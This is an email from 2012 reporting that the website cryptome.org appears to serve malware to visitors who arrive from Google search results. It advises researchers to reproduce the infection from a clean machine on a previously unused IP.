CC: "'noc[at}networksolutions.com'" <noc[at}networksolutions.com>,
"'abuse[at}networksolutions.com'" <abuse[at}networksolutions.com>
Date: Mon, 12 Mar 2012 12:06:55 -0700
Subject: RE: Infected host at IP 205.178.145.72 cryptome.org
Here is some PRO HELP.
The Sucuri scanner also shows you infected.
[]
We have a log of everything that happened. My user opened a new browser, went
to Google and did a GOOGLE SEARCH for
BLM NEPA
A link from your site comes up as the fourth or fifth hit. My user clicked this
link. Fit hit the shan.
The malware may only present itself when the referer is Google. If you are brave,
perform the same search and click the link from a clean machine ready for malware
reasearch (get your HTTPwatch ready) from a PUBLIC IP THAT HAS NEVER VISITED YOUR
SERVER because these hackers are known to record IPs and dish out malware selectively
to prevent followup security research from IPs of visitors that they try to infect.
|
